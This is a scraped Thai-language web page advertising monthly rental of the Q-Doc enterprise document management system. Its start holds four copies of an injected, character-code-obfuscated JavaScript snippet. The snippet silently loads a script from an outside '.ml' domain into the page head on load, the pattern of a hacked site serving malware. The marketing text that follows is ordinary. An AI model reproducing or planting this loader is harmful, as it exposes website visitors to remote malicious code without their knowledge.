Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); บริการเช่าซอฟต์แวร์รายเดือน – alfresco

บริการเช่าซอฟต์แวร์รายเดือน

บริการเช่า Software รายเดือน ไม่ต้องจัดซื้อ Q-Doc Software จัดเก็บเอกสารครบวงจร
Q-Doc Enterprise Content Management System

 Software การจัดเก็บเอกสาร และไฟล์ระดับองค์กร(Enterprise Content Management)

 ระบบ Software จัดเก็บข้อมูลเอกสารขององค์กร ที่เก็บรักษาเอกสาร 

 และค้นหาเอกสารอย่างรวดเร็ว เสมือนมีGoogle ในองค์กรของท่านที่

 สามารถค้นหาเอกสารต่างๆ ได้อย่างรวดเร็ว และถูกต้อง และสามารถเข้า

 ถึงเนื้อเอกสารอย่างรวดเร็ว พร้อมด้วยระบบรักษาความปลอดภัยที่

จะเข้าถึงเอกสารได้ตามสิทธิของผู้ใช้งาน อีกทั้งมีกระบวนการเปลี่ยน

จากภาพสแกน ไปเป็นตัวหนังสือ เพื่อใช้ในการค้นหา 

โดยไม่ต้องพิมพ์ข้อมูล (OCR) ซึ่งรองรับทั้งภาษาไทย และอังกฤษ

Q-Doc Enterprise Content Management Features

Q-Doc เป็นระบบ Enterprise Content Management (ECM) พัฒนา Core-Engine โดยทีมงานจาก ซึ่งมีประสบการณ์ด้านนี้กว่า 20 ปี ด้วยความเชื่อว่า ECMแบบโบราณที่ใช้กันอยู่นั้นทั้งแพงและซับซ้อนเกินไป 20% ของ information ในองค์กรเป็น data ที่จัดการด้วยระบบ database และ enterprise applicationต่างๆ ส่วนอีก 80% เป็น content (ข้อมูลที่ปราศจากโครงสร้าง) จะเห็นว่าcontent มีปริมาณมากกว่า data มาก จึงต้องมีการจัดการอย่างเหมาะสม องค์กรมีวิธีจัดการ content อยู่ 3 แบบ

1.ไม่จัดการเลย โดยการเก็บไว้ใน file server หรือ shared drive หรือแย่ที่สุดคือฮาร์ดดิสก์ของผู้ใช้แต่ละคน

2.ใช้ ECM แบบโบราณซึ่งมีราคาแพง ทำให้ต้องจำกัดจำนวนผู้ใช้

3. ใช้ Q-Doc ซึ่งประหยัดและใช้ง่าย สามารถ rollout ให้ใช้งานทั้งองค์กรได้อย่างรวดเร็ว ติดตั้งแล้วเสร็จ เริ่มต้นภายใน 3 วัน